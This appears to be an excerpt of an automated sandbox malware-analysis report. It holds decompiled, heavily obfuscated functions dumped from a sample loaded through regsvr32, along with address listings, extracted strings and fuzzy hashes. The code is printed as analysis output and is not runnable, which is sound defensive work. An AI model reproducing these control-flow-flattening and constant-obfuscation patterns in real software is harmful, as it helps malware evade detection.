							_t505 = _t504 +  *_t155;
							_v128 = 0x9d16f5;
							_v128 = _v128 | 0xae2bd0fd;
							_t460 = 0x6e;
							_v128 = _v128 * 0x5a;
							_v128 = _v128 * 0x69;
							_v128 = _v128 ^ 0xb59a4ad7;
							_v140 = 0x7ac23b;
							_v140 = _v140 + 0xffff7bbd;
							_v140 = _v140 + 0x67e2;
							_v140 = _v140 ^ 0x0071c9b3;
							_v136 = 0x15ed27;
							_v136 = _v136 << 2;
							_v136 = _v136 + 0xffff0cad;
							_v136 = _v136 / _t460;
							_v136 = _v136 ^ 0x000ba606;
							_v132 = 0xeb2634;
							_v132 = _v132 | 0x8f19fd9a;
							_v132 = _v132 ^ 0x8ff0cd4b;
							E003DF4FB(_v128, _v116, _v140, _t505, _v136, _v112, _v132);
							_t506 = _t505 + _v112;
							_t510 = _t510 + 0x20;
							_v132 = 0xdb42fc;
							_v132 = _v132 + 0xffff3474;
							_v132 = _v132 ^ 0xd84dde10;
							_v132 = _v132 ^ 0xd895f00e;
							_v140 = 0x4f8a9d;
							_v140 = _v140 + 0x6cb2;
							_v140 = _v140 >> 6;
							_v140 = _v140 ^ 0x00065959;
							_push(_t506);
							_push(_v140);
							E003CEA8C(_v132, _v120);
							_t465 = _t506;
							_t492 = _v120 + _t506;
							__eflags = _t506 - _t492;
							if(_t506 >= _t492) {
								L18:
								_v140 = 0xae4a5;
								_t466 = 0x5a;
								_push(_t466);
								_v140 = _v140 * 0x24;
								_v140 = _v140 / _t466;
								_v140 = _v140 ^ 0x00045b7b;
								_v136 = 0x480eeb;
								_v136 = _v136 | 0x74660660;
								_v136 = _v136 ^ 0xe1d0826f;
								_v136 = _v136 >> 0x10;
								_v136 = _v136 ^ 0x0006c742;
								_v132 = 0x4c1b92;
								_v132 = _v132 * 0x37;
								_v132 = _v132 ^ 0x1052cb9e;
								_t425 = E003C2B6C(0, _v140);
								_t454 = _v124;
								 *((char*)(_t425 + _t506)) = 0;
								_t391 = 0xf2ceb;
								goto L1;
							} else {
								goto L15;
							}
							do {
								L15:
								__eflags =  *_t465;
								if( *_t465 == 0) {
									_v136 = 0xa6da8a;
									_v136 = _v136 * 0x60;
									_v136 = _v136 * 0x3f;
									_v136 = _v136 << 0xd;
									_t222 =  &_v136;
									 *_t222 = _v136 ^ 0x5f8800c3;
									__eflags =  *_t222;
									 *_t465 = _v136;
								}
								_t465 = _t465 + 1;
								__eflags = _t465 - _t492;
							} while (_t465 < _t492);
							goto L18;
						}
						if(_t391 == 0x529c) {
							_v72 = _t454;
							_v52 =  &_v32;
							_v84 =  *_t502;
							_v80 =  *((intOrPtr*)(_t502 + 4));
							_v48 = 0x20;
							_v132 = 0x8e7047;
							_v132 = _v132 + 0xffff4b48;
							_v132 = _v132 * 0x12;
							_v132 = _v132 ^ 0x09f47253;
							_v140 = 0xdee929;
							_v140 = _v140 >> 7;
							_v140 = _v140 ^ 0x0005e528;
							_t434 = E003CDAE6(_t452,  &_v88, _v132, _v140,  &_v108);
							__eflags = _t434;
							if(_t434 == 0) {
								L33:
								return _t507;
							}
							_t391 = 0x3846b;
							L10:
							_t454 = _v124;
							continue;
							do {
								while(1) {
									_t514 = _t391 - 0x61747;
									if(_t514 > 0) {
										goto L19;
									}
									goto L3;
								}
								goto L19;
								L30:
								__eflags = _t391 - 0x91ea1;
							} while (_t391 != 0x91ea1);
							goto L33;
						}
						if(_t391 == 0x9f03) {
							_v140 = 0x9285a9;
							_v140 = _v140 + 0xffff54c7;
							_v140 = _v140 ^ 0x009ba850;
							_v136 = 0x6d91fb;
							_push(_t454);
							_v136 = _v136 * 0x49;
							_v136 = _v136 * 0x14;
							_v136 = _v136 ^ 0xa80b171c;
							_v136 = _v136 ^ 0xd8e302ff;
							_v132 = 0x59ecfb;
							_v132 = _v132 | 0x28fad9bb;
							_v132 = _v132 ^ 0x28fbfd7b;
							_v128 = 0x35b637;
							_v128 = _v128 >> 6;
							_v128 = _v128 | 0x138d64b1;
							_v128 = _v128 + 0xc036;
							_v128 = _v128 ^ 0x138eb73f;
							_t439 = E003C2B6C(_v128, _v132);
							_v140 = 0xfad5c8;
							_v140 = _v140 + 0xb8f7;
							_v140 = _v140 ^ 0x00fb8eff;
							_v120 = _t439;
							_t452[1] = _v140 + _v112 + _v120;
							_t391 = 0x93a3a;
							goto L10;
						}
						if(_t391 == 0x3846b) {
							_v136 = 0xd4c02c;
							_v136 = _v136 + 0xffff90fb;
							_v136 = _v136 ^ 0xec9c2515;
							_v136 = _v136 ^ 0x0df9bd65;
							_v136 = _v136 ^ 0xe1bcfb09;
							_v128 = 0x99be14;
							_v128 = _v128 ^ 0x356ef1a6;
							_t476 = 0x53;
							_v128 = _v128 / _t476;
							_v128 = _v128 * 0x75;
							_v128 = _v128 ^ 0x4c1b818c;
							_v140 = 0xeb4b60;
							_t33 =  &_v140; // 0xeb4b60
							_v140 =  *_t33 * 0xa;
							_v140 = _v140 ^ 0x09327fdb;
							_v132 = 0xd62ab9;
							_v132 = _v132 + 0xffffb954;
							_v132 = _v132 + 0x4482;
							_v132 = _v132 ^ 0x00daf225;
							_t449 = E003D2606(_v136, _v128,  &_v116,  &_v108, _v140, _v132);
							_t510 = _t510 + 0x10;
							asm("sbb eax, eax");
							_t391 = ( ~_t449 & 0xfff50191) + 0xb9d72;
							__eflags = _t391;
							goto L10;
						}
						if(_t391 != 0x3a272) {
							goto L30;
						}
						_t391 = 0x8ad13;
						continue;
						L19:
						__eflags = _t391 - 0x8ad13;
						if(_t391 == 0x8ad13) {
							_v132 = 0xf98649;
							_v132 = _v132 >> 4;
							_v132 = _v132 | 0x7d8ecc70;
							_v132 = _v132 * 0x74;
							_v132 = _v132 ^ 0xe5231fc3;
							_v140 = 0x87b27f;
							_v140 = _v140 >> 5;
							_v140 = _v140 ^ 0x0005694a;
							_v128 = 0x18efe1;
							_v128 = _v128 + 0xc649;
							_v128 = _v128 + 0x9b21;
							_v128 = _v128 ^ 0xbbb4cc5c;
							_v128 = _v128 ^ 0xbba90c90;
							_v136 = 0x3dc398;
							_v136 = _v136 ^ 0xc1440f58;
							_v136 = _v136 >> 0x10;
							_v136 = _v136 + 0x8526;
							_v136 = _v136 ^ 0x0006cdb2;
							_t394 = E003CEC5D(_v132, _v140, _v128, _v136,  *((intOrPtr*)(_t502 + 4)),  &_v32,  *_t502);
							_t510 = _t510 + 0x18;
							__eflags = _t394;
							if(_t394 == 0) {
								_t454 = _v124;
								_t391 = 0x91ea1;
								goto L30;
							}
							_t391 = 0x529c;
							goto L10;
						}
						__eflags = _t391 - 0x93a3a;
						if(__eflags == 0) {
							_v136 = 0xa4518f;
							_v136 = _v136 + 0xffff29a6;
							_v136 = _v136 << 1;
							_v136 = _v136 ^ 0x014b1fa6;
							_v132 = 0xe61b84;
							_v132 = _v132 + 0xffffa159;
							_v132 = _v132 + 0xffffb828;
							_v132 = _v132 ^ 0x00edef72;
							_v140 = 0xa3a573;
							_v140 = _v140 << 0xb;
							_v140 = _v140 + 0xd56d;
							_v140 = _v140 ^ 0x1d2ceb1f;
							_push(_t454);
							_push(_t454);
							_t399 = E003C8D52(_t454, _t452[1], __eflags);
							 *_t452 = _t399;
							__eflags = _t399;
							if(_t399 == 0) {
								_t391 = 0xf2ceb;
							} else {
								_t391 = 0x61747;
								_t507 = 1;
							}
							goto L10;
						}
						__eflags = _t391 - 0xb9d72;
						if(_t391 == 0xb9d72) {
							_v136 = 0xea1e6d;
							_v136 = _v136 | 0xfff2d76f;
							_v136 = _v136 ^ 0xfff8d57e;
							_v140 = 0xbeba9b;
							_t457 = 0x1c;
							_v140 = _v140 * 0x34;
							_v140 = _v140 / _t457;
							_v140 = _v140 ^ 0x016a0d1c;
							_v132 = 0xd86456;
							_v132 = _v132 | 0x22158e22;
							_v132 = _v132 + 0xffff250c;
							_v132 = _v132 + 0xffff7cd0;
							_v132 = _v132 ^ 0x22df5fe8;
							_v124 = 0xfea400;
							_v124 = _v124 | 0xb52ef297;
							_v124 = _v124 * 0x23;
							_v124 = _v124 + 0x1179;
							_t382 =  &_v124;
							 *_t382 = _v124 ^ 0xe1d69e5d;
							__eflags =  *_t382;
							E003C79D0(_v136, _v140,  *_t382, _v132, _v108, _v124);
							goto L33;
						}
						__eflags = _t391 - 0xf2ceb;
						if(__eflags != 0) {
							goto L30;
						}
						_v140 = 0x5038b3;
						_v140 = _v140 | 0x58e0a20c;
						_v140 = _v140 << 5;
						_v140 = _v140 ^ 0x1e1e36f2;
						_v128 = 0x2999d7;
						_t478 = 0x57;
						_v128 = _v128 * 0x12;
						_v128 = _v128 ^ 0x02ec484e;
						_v136 = 0xf2e9d7;
						_v136 = _v136 + 0x967d;
						_v136 = _v136 ^ 0x00ff9d28;
						_v132 = 0x3f8f94;
						_v132 = _v132 / _t478;
						_v132 = _v132 ^ 0x00027928;
						E003C79D0(_v140, _v128, __eflags, _v136, _v116, _v132);
						_t510 = _t510 + 0xc;
						_t391 = 0xb9d72;
						goto L10;
					}
				}
			}

0x003c3244
0x003c324e
0x003c3255
0x003c325c
0x003c325d
0x003c325e
0x003c3265
0x003c3269
0x003c3270
0x003c3271
0x003c3272
0x003c3277
0x003c327f
0x003c3282
0x003c328a
0x003c328c
0x003c3291
0x003c3299
0x003c3299
0x003c329e
0x003c329e
0x003c32a0
0x00000000
0x00000000
0x003c32a6
0x003c32a6
0x003c34f5
0x003c34f9
0x003c3506
0x003c350a
0x003c3512
0x003c351a
0x003c3522
0x003c352a
0x003c3532
0x003c353a
0x003c3547
0x003c354b
0x003c3553
0x003c355b
0x003c3563
0x003c356b
0x003c3573
0x003c357b
0x003c3593
0x003c3598
0x003c35a3
0x003c35aa
0x003c35b2
0x003c35b6
0x003c35b8
0x003c35c0
0x003c35cf
0x003c35d0
0x003c35d9
0x003c35dd
0x003c35e5
0x003c35ed
0x003c35f5
0x003c35fd
0x003c3605
0x003c360d
0x003c3612
0x003c3620
0x003c3624
0x003c362c
0x003c3634
0x003c363c
0x003c365d
0x003c3662
0x003c3666
0x003c366d
0x003c3675
0x003c367d
0x003c3685
0x003c368d
0x003c3695
0x003c369d
0x003c36a2
0x003c36aa
0x003c36ab
0x003c36b3
0x003c36be
0x003c36c0
0x003c36c2
0x003c36c4
0x003c36fd
0x003c36fd
0x003c370e
0x003c370f
0x003c3710
0x003c371c
0x003c3720
0x003c3728
0x003c3730
0x003c3738
0x003c3740
0x003c3745
0x003c374d
0x003c375a
0x003c375e
0x003c3772
0x003c3779
0x003c377d
0x003c3781
0x00000000
0x00000000
0x00000000
0x00000000
0x003c36c6
0x003c36c6
0x003c36c6
0x003c36c9
0x003c36cb
0x003c36d8
0x003c36e1
0x003c36e5
0x003c36ea
0x003c36ea
0x003c36ea
0x003c36f6
0x003c36f6
0x003c36f8
0x003c36f9
0x003c36f9
0x00000000
0x003c36c6
0x003c32b1
0x003c3471
0x003c347c
0x003c3486
0x003c348d
0x003c3491
0x003c3499
0x003c34a1
0x003c34ae
0x003c34b6
0x003c34be
0x003c34c6
0x003c34cb
0x003c34dc
0x003c34e3
0x003c34e5
0x003c3a58
0x003c3a62
0x003c3a62
0x003c34eb
0x003c339c
0x003c339c
0x003c33a0
0x003c329e
0x003c329e
0x003c329e
0x003c32a0
0x00000000
0x00000000
0x00000000
0x003c32a0
0x00000000
0x003c3999
0x003c3999
0x003c3999
0x00000000
0x003c39a4
0x003c32bc
0x003c33a5
0x003c33ad
0x003c33b5
0x003c33bd
0x003c33ca
0x003c33cb
0x003c33d4
0x003c33d8
0x003c33e0
0x003c33e8
0x003c33f0
0x003c33f8
0x003c3400
0x003c3408
0x003c340d
0x003c3415
0x003c341d
0x003c3435
0x003c343a
0x003c3442
0x003c344a
0x003c3452
0x003c3463
0x003c3466
0x00000000
0x003c346b
0x003c32c7
0x003c32db
0x003c32e5
0x003c32ed
0x003c32f5
0x003c32fd
0x003c3305
0x003c330d
0x003c331b
0x003c331e
0x003c3327
0x003c332b
0x003c3333
0x003c333b
0x003c3340
0x003c3348
0x003c3350
0x003c3358
0x003c3360
0x003c3368
0x003c3386
0x003c338b
0x003c3390
0x003c3397
0x003c3397
0x00000000
0x003c3397
0x003c32ce
0x00000000
0x00000000
0x003c32d4
0x00000000
0x003c378b
0x003c378b
0x003c3790
0x003c38d5
0x003c38dd
0x003c38e2
0x003c38ef
0x003c38fa
0x003c3902
0x003c390a
0x003c390f
0x003c3917
0x003c391f
0x003c3927
0x003c392f
0x003c3937
0x003c393f
0x003c3947
0x003c394f
0x003c3954
0x003c395c
0x003c397a
0x003c397f
0x003c3982
0x003c3984
0x003c3990
0x003c3994
0x00000000
0x003c3994
0x003c3986
0x00000000
0x003c3986
0x003c3796
0x003c379b
0x003c384a
0x003c3852
0x003c385a
0x003c385e
0x003c3866
0x003c386e
0x003c3876
0x003c387e
0x003c3886
0x003c388e
0x003c3893
0x003c389b
0x003c38b2
0x003c38b3
0x003c38b4
0x003c38b9
0x003c38bd
0x003c38bf
0x003c38cb
0x003c38c1
0x003c38c3
0x003c38c5
0x003c38c5
0x00000000
0x003c38bf
0x003c37a1
0x003c37a6
0x003c39a9
0x003c39b3
0x003c39bb
0x003c39c3
0x003c39d2
0x003c39d3
0x003c39dd
0x003c39e1
0x003c39e9
0x003c39f1
0x003c39f9
0x003c3a01
0x003c3a09
0x003c3a11
0x003c3a19
0x003c3a26
0x003c3a2a
0x003c3a32
0x003c3a32
0x003c3a32
0x003c3a4e
0x00000000
0x003c3a53
0x003c37ac
0x003c37b1
0x00000000
0x00000000
0x003c37b7
0x003c37c1
0x003c37c9
0x003c37ce
0x003c37d6
0x003c37e5
0x003c37e6
0x003c37ea
0x003c37f2
0x003c37fa
0x003c3802
0x003c380a
0x003c3818
0x003c381c
0x003c3838
0x003c383d
0x003c3840
0x00000000
0x003c3840
0x003c329e

Strings

::, xrefs: 003C3796
, xrefs: 003C3491
r, xrefs: 003C38A7
{92, xrefs: 003C353A
::, xrefs: 003C3466
`K, xrefs: 003C333B

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $::$::$`K$r${92
API String ID: 0-2367992621
Opcode ID: 2e8251642721325237354afe8a6e71b958ae3cef8a03a582ddd678169dcc9975
Instruction ID: ed6dfdde39d2b6a049fe9724417c997df1eb38d7a5354b7715a9e3c7dbe8744d
Opcode Fuzzy Hash: 2e8251642721325237354afe8a6e71b958ae3cef8a03a582ddd678169dcc9975
Instruction Fuzzy Hash: 7922FDB25083428FC359CF25D58A90BBBE1BBD8748F108A1DF0D6A6261D774CA498F97

Uniqueness

Uniqueness Score: -1.00%

Function 003DFF4A Relevance: 7.9, Strings: 6, Instructions: 388
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E003DFF4A(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				short _v2604;
				intOrPtr _v2608;
				intOrPtr _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				void* _t430;
				short* _t438;
				void* _t447;
				void* _t462;
				void* _t468;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t496;
				signed int _t498;
				signed int _t499;
				signed int _t501;
				signed int _t502;
				signed int _t505;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t513;
				void* _t555;
				signed int* _t559;

				_t559 =  &_v2636;
				_v2612 = 0xeadd2;
				_t555 = __ecx;
				_v2608 = 0x7a59d;
				_v2604 = 0;
				_t430 = 0x57712;
				do {
					while(_t430 != 0x52aff) {
						if(_t430 == 0x57712) {
							_t430 = 0x52aff;
							continue;
						} else {
							_t567 = _t430 - 0xf618a;
							if(_t430 == 0xf618a) {
								_v2624 = 0x7af44d;
								_v2624 = _v2624 + 0xc4f8;
								_v2624 = _v2624 + 0xef81;
								_v2624 = _v2624 ^ 0x007ca8ef;
								_v2620 = 0xe39ee3;
								_v2620 = _v2620 + 0xcbbf;
								_v2620 = _v2620 ^ 0x00e2b2d2;
								_v2632 = 0xdb8a68;
								_v2632 = _v2632 + 0x4df2;
								_v2632 = _v2632 << 7;
								_t505 = 0x6f;
								_push(_t505);
								_v2632 = _v2632 / _t505;
								_v2632 = _v2632 ^ 0x00fef98d;
								_v2616 = 0x48e03b;
								_push(_t505);
								_v2616 = _v2616 * 0x53;
								_v2616 = _v2616 ^ 0x17a3ea1b;
								_v2628 = 0xc0f5fb;
								_v2628 = _v2628 | 0xf274588e;
								_v2628 = _v2628 ^ 0xf2f8b781;
								_v2636 = 0xe43763;
								_v2636 = _v2636 + 0xfffff7cf;
								_v2636 = _v2636 | 0xf6aa9cbd;
								_v2636 = _v2636 << 0xd;
								_v2636 = _v2636 ^ 0xd7fe3a5c;
								E003CD5B0(_v2624,  &_v1040, _v2620, _v2632, _v2616, _v2628, _t505, _v2636);
								_v2632 = 0x8c8cf7;
								_v2632 = _v2632 + 0x9a97;
								_v2632 = _v2632 + 0xffffa8f0;
								_v2632 = _v2632 >> 2;
								_v2632 = _v2632 ^ 0x002707d7;
								_v2636 = 0x1bc3dd;
								_v2636 = _v2636 + 0xffff1aae;
								_v2636 = _v2636 << 7;
								_v2636 = _v2636 * 0x3a;
								_v2636 = _v2636 ^ 0x0b394a72;
								_v2616 = 0x26299a;
								_v2616 = _v2616 << 0xe;
								_v2616 = _v2616 ^ 0x8a643e3b;
								_v2620 = 0x5a068;
								_v2620 = _v2620 + 0xffff582b;
								_v2620 = _v2620 ^ 0x00056084;
								_t468 = E003CD933(_v2632, _v2636, 0x3c1158, _v2616, _v2620);
								_v2628 = 0x1fb180;
								_v2628 = _v2628 | 0x3a5dadbf;
								_t508 = 0x63;
								_v2628 = _v2628 / _t508;
								_v2628 = _v2628 ^ 0x009494f7;
								_v2624 = 0xbee1ae;
								_v2624 = _v2624 + 0xffffe007;
								_t509 = 0x30;
								_v2624 = _v2624 / _t509;
								_v2624 = _v2624 ^ 0x00088681;
								_v2632 = 0x1fa7bc;
								_v2632 = _v2632 << 2;
								_t510 = 0x59;
								_v2632 = _v2632 * 0x38;
								_v2632 = _v2632 << 0xb;
								_v2632 = _v2632 ^ 0x9627fb2c;
								_v2636 = 0x4aca1d;
								_v2636 = _v2636 >> 3;
								_v2636 = _v2636 / _t510;
								_v2636 = _v2636 >> 0x10;
								_v2636 = _v2636 ^ 0x00098969;
								E003D0E90( &_v1040, _t567, _t510, _v2624, _v2632,  &_v2600,  &_v520, _v2636, _t468);
								_v2632 = 0x817e4a;
								_v2632 = _v2632 << 0xa;
								_v2632 = _v2632 ^ 0x2602111b;
								_v2632 = _v2632 ^ 0x23ff6de2;
								_v2624 = 0x8e12a0;
								_v2624 = _v2624 << 0x10;
								_v2624 = _v2624 * 0x1e;
								_v2624 = _v2624 ^ 0x2ecd079d;
								_v2636 = 0x33d98;
								_v2636 = _v2636 * 0x5d;
								_v2636 = _v2636 + 0xffff03ce;
								_v2636 = _v2636 | 0xc8650685;
								_v2636 = _v2636 ^ 0xc9616c67;
								E003C43D3(_v2632, _v2624, _v2636, _t468);
								_v2616 = 0xdc3610;
								_v2616 = _v2616 << 0xd;
								_v2616 = _v2616 ^ 0x86c98905;
								_v2624 = 0xb869a6;
								_v2624 = _v2624 ^ 0x568975bb;
								_v2624 = _v2624 >> 8;
								_v2624 = _v2624 ^ 0x00559766;
								_v2636 = 0xa3e0a6;
								_v2636 = _v2636 + 0x13eb;
								_v2636 = _v2636 + 0x7803;
								_t513 = 0x38;
								_v2636 = _v2636 * 0x7a;
								_v2636 = _v2636 ^ 0x4e52036f;
								_v2620 = 0x6af42d;
								_v2620 = _v2620 / _t513;
								_v2620 = _v2620 ^ 0x0005344a;
								return E003D8BA1(_v2616, _v2624, _v2620, 0, 0, _v2636,  &_v520, 0, _v2620);
							}
							goto L9;
						}
						L5:
						return _t462;
					}
					_v2628 = 0x651a0f;
					_v2628 = _v2628 ^ 0xda3ee66c;
					_v2628 = _v2628 << 9;
					_v2628 = _v2628 ^ 0xb7f7a61f;
					_v2632 = 0x546c93;
					_v2632 = _v2632 << 4;
					_t489 = 0x1d;
					_v2632 = _v2632 / _t489;
					_v2632 = _v2632 ^ 0x002452a0;
					_v2636 = 0xb9ac3d;
					_t490 = 0x54;
					_v2636 = _v2636 / _t490;
					_v2636 = _v2636 | 0x3994895d;
					_v2636 = _v2636 ^ 0x3991cac3;
					E003C2493(_t490,  &_v2080, _v2628, _v2632, _v2636);
					_v2628 = 0x492a9b;
					_v2628 = _v2628 >> 0xf;
					_v2628 = _v2628 + 0xef1c;
					_v2628 = _v2628 + 0xedf9;
					_v2628 = _v2628 ^ 0x000a4821;
					_v2632 = 0xdaf15f;
					_v2632 = _v2632 | 0x8e315915;
					_v2632 = _v2632 + 0xffff842a;
					_v2632 = _v2632 ^ 0x8ef68b30;
					_v2636 = 0xded82a;
					_v2636 = _v2636 >> 8;
					_t491 = 0x55;
					_v2636 = _v2636 / _t491;
					_v2636 = _v2636 ^ 0x000470d9;
					_t438 = E003D7C07( &_v2080, _v2628, _v2632, _v2636);
					_push(0x16);
					 *_t438 = 0;
					_v2632 = 0x2e1199;
					_v2632 = _v2632 + 0xffff2602;
					_v2632 = _v2632 ^ 0x571c3586;
					_v2632 = _v2632 + 0xffffd767;
					_v2632 = _v2632 ^ 0x57348166;
					_v2628 = 0x3ca528;
					_v2628 = _v2628 + 0x33d;
					_v2628 = _v2628 ^ 0xb4a5419d;
					_v2628 = _v2628 / 0;
					_v2628 = _v2628 ^ 0x083f3847;
					_v2636 = 0x754787;
					_v2636 = _v2636 ^ 0x51a09379;
					_v2636 = _v2636 | 0x7b399127;
					_v2636 = _v2636 ^ 0x7bfddea9;
					E003C4E03( &_v1560, _v2632, __eflags, _v2628, _v2636);
					_v2628 = 0x34d8cc;
					_v2628 = _v2628 * 0x34;
					_v2628 = _v2628 ^ 0x7b2c4f67;
					_v2628 = _v2628 + 0xf730;
					_v2628 = _v2628 ^ 0x719ed47b;
					_v2624 = 0x3837ca;
					_v2624 = _v2624 << 5;
					_v2624 = _v2624 >> 4;
					_v2624 = _v2624 ^ 0x007b4568;
					_v2636 = 0xe7264;
					_v2636 = _v2636 ^ 0x6ed0279c;
					_t496 = 3;
					_v2636 = _v2636 * 3;
					_v2636 = _v2636 ^ 0x4c95a733;
					_v2632 = 0x7667bd;
					_v2632 = _v2632 * 0x72;
					_v2632 = _v2632 / _t496;
					_v2632 = _v2632 + 0xffffe99e;
					_v2632 = _v2632 ^ 0x119e62aa;
					_t447 = E003CD933(_v2628, _v2624, 0x3c1108, _v2636, _v2632);
					_v2636 = 0x4f16d1;
					_t498 = 0x3f;
					_v2636 = _v2636 / _t498;
					_v2636 = _v2636 << 2;
					_v2636 = _v2636 << 3;
					_v2636 = _v2636 ^ 0x0026c10a;
					_v2628 = 0x4472e7;
					_v2628 = _v2628 >> 8;
					_t499 = 0x77;
					_v2628 = _v2628 / _t499;
					_v2628 = _v2628 << 9;
					_v2628 = _v2628 ^ 0x0000bc1e;
					_v2632 = 0x7923fa;
					_v2632 = _v2632 * 0x59;
					_v2632 = _v2632 * 0x41;
					_v2632 = _v2632 | 0x2b27ffea;
					_v2632 = _v2632 ^ 0xbb716e23;
					_v2624 = 0xaef1c6;
					_v2624 = _v2624 >> 2;
					_v2624 = _v2624 ^ 0x0029e61e;
					E003D0E90( &_v2080, __eflags, _t499, _v2628, _v2632,  &_v1560,  &_v2600, _v2624, _t447);
					_v2636 = 0xdb431c;
					_v2636 = _v2636 | 0x3e2a1264;
					_t501 = 5;
					_v2636 = _v2636 / _t501;
					_v2636 = _v2636 ^ 0x0c9f6788;
					_v2624 = 0x837d66;
					_t502 = 0xd;
					_v2624 = _v2624 / _t502;
					_v2624 = _v2624 + 0xffff2470;
					_v2624 = _v2624 ^ 0x000f5fdb;
					_v2632 = 0xe6f70e;
					_v2632 = _v2632 + 0x30a5;
					_v2632 = _v2632 ^ 0x00e29afa;
					E003C43D3(_v2636, _v2624, _v2632, _t447);
					_v2636 = 0x5e34da;
					_v2636 = _v2636 | 0x73fe9c48;
					_v2636 = _v2636 + 0xffffdbea;
					_v2636 = _v2636 + 0x9b59;
					_v2636 = _v2636 ^ 0x73faa3f6;
					_v2624 = 0xf77f45;
					_v2624 = _v2624 + 0x6ad0;
					_v2624 = _v2624 ^ 0x00ffe0e5;
					_t462 = E003C89F6( &_v2600, _t555, _v2624);
					_t559 =  &(_t559[0x15]);
					__eflags = _t462;
					if(_t462 != 0) {
						_t430 = 0xf618a;
						goto L9;
					}
					goto L5;
					L9:
					__eflags = _t430 - 0xa8358;
				} while (_t430 != 0xa8358);
				return _t430;
			}

0x003dff4a
0x003dff55
0x003dff5e
0x003dff60
0x003dff68
0x003dff6c
0x003dff76
0x003dff76
0x003dff83
0x003e02f2
0x00000000
0x003dff89
0x003dff89
0x003dff8e
0x003dff94
0x003dff9e
0x003dffa6
0x003dffae
0x003dffb6
0x003dffbe
0x003dffc6
0x003dffce
0x003dffd6
0x003dffde
0x003dffe9
0x003dffec
0x003dffed
0x003dfff8
0x003e0000
0x003e000d
0x003e000e
0x003e0012
0x003e001a
0x003e0022
0x003e002a
0x003e0032
0x003e003a
0x003e0042
0x003e004a
0x003e004f
0x003e0070
0x003e0075
0x003e007d
0x003e0085
0x003e008d
0x003e0092
0x003e009a
0x003e00a2
0x003e00aa
0x003e00b4
0x003e00b8
0x003e00c0
0x003e00c8
0x003e00cd
0x003e00d5
0x003e00dd
0x003e00e5
0x003e0102
0x003e010a
0x003e0112
0x003e0124
0x003e0129
0x003e012f
0x003e0137
0x003e013f
0x003e014b
0x003e014e
0x003e0154
0x003e015c
0x003e0164
0x003e0170
0x003e0172
0x003e0176
0x003e017b
0x003e0183
0x003e018b
0x003e019d
0x003e01a8
0x003e01ad
0x003e01cc
0x003e01d1
0x003e01d9
0x003e01de
0x003e01e6
0x003e01ee
0x003e01f6
0x003e0201
0x003e0205
0x003e020d
0x003e021a
0x003e021e
0x003e0226
0x003e022e
0x003e0242
0x003e0247
0x003e0251
0x003e0256
0x003e025e
0x003e0266
0x003e026e
0x003e0273
0x003e027b
0x003e0283
0x003e028b
0x003e029a
0x003e029b
0x003e029f
0x003e02a7
0x003e02b5
0x003e02c0
0x00000000
0x003e02e4
0x00000000
0x003dff8e
0x003e02f1
0x003e02f1
0x003e02f1
0x003e02f9
0x003e0303
0x003e030b
0x003e0310
0x003e0318
0x003e0320
0x003e032b
0x003e0330
0x003e0336
0x003e033e
0x003e034a
0x003e0354
0x003e0358
0x003e0360
0x003e0374
0x003e0379
0x003e0383
0x003e0388
0x003e0390
0x003e0398
0x003e03a0
0x003e03a8
0x003e03b0
0x003e03b8
0x003e03c0
0x003e03c8
0x003e03d3
0x003e03dd
0x003e03e1
0x003e03f5
0x003e03fe
0x003e0400
0x003e0403
0x003e040b
0x003e0413
0x003e041b
0x003e0423
0x003e042b
0x003e0433
0x003e043b
0x003e0451
0x003e0455
0x003e045d
0x003e0465
0x003e046d
0x003e0475
0x003e0489
0x003e048e
0x003e049b
0x003e049f
0x003e04a7
0x003e04af
0x003e04b9
0x003e04c1
0x003e04c6
0x003e04cb
0x003e04d3
0x003e04db
0x003e04ea
0x003e04eb
0x003e04ef
0x003e04f7
0x003e0504
0x003e050e
0x003e0512
0x003e051a
0x003e0537
0x003e053c
0x003e0551
0x003e0556
0x003e055c
0x003e0561
0x003e0566
0x003e056e
0x003e0576
0x003e057f
0x003e0583
0x003e058e
0x003e0593
0x003e059b
0x003e05a8
0x003e05b1
0x003e05b9
0x003e05c1
0x003e05c9
0x003e05d1
0x003e05d6
0x003e05f8
0x003e05fd
0x003e0607
0x003e0615
0x003e0618
0x003e061c
0x003e0624
0x003e0634
0x003e0638
0x003e063c
0x003e0644
0x003e064c
0x003e0654
0x003e065c
0x003e0670
0x003e0675
0x003e0681
0x003e0689
0x003e0691
0x003e0699
0x003e06a1
0x003e06a9
0x003e06b1
0x003e06c2
0x003e06c7
0x003e06ca
0x003e06cc
0x003e06d2
0x00000000
0x003e06d2
0x00000000
0x003e06d7
0x003e06d7
0x003e06d7
0x00000000

Strings

;H, xrefs: 003E0000
rD, xrefs: 003E056E
!H, xrefs: 003E0398
c7, xrefs: 003E0032
gO,{, xrefs: 003E049F
hE{, xrefs: 003E04CB

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !H$;H$c7$gO,{$hE{$rD
API String ID: 0-3065149945
Opcode ID: ad5c4e3b73591598cc9aeaaf22c78bb213c27c0a2b2508f5c5d2158490b0a369
Instruction ID: 96a11f0aadd5ac3942f61c71bd94be4e788853f65e0960c34fa21ad7b7fb5643
Opcode Fuzzy Hash: ad5c4e3b73591598cc9aeaaf22c78bb213c27c0a2b2508f5c5d2158490b0a369
Instruction Fuzzy Hash: 2E1210B1409381AFC389CF21D58990BBBE1FBD8748F409A1DF19696260D7B4CA19CF87

Uniqueness

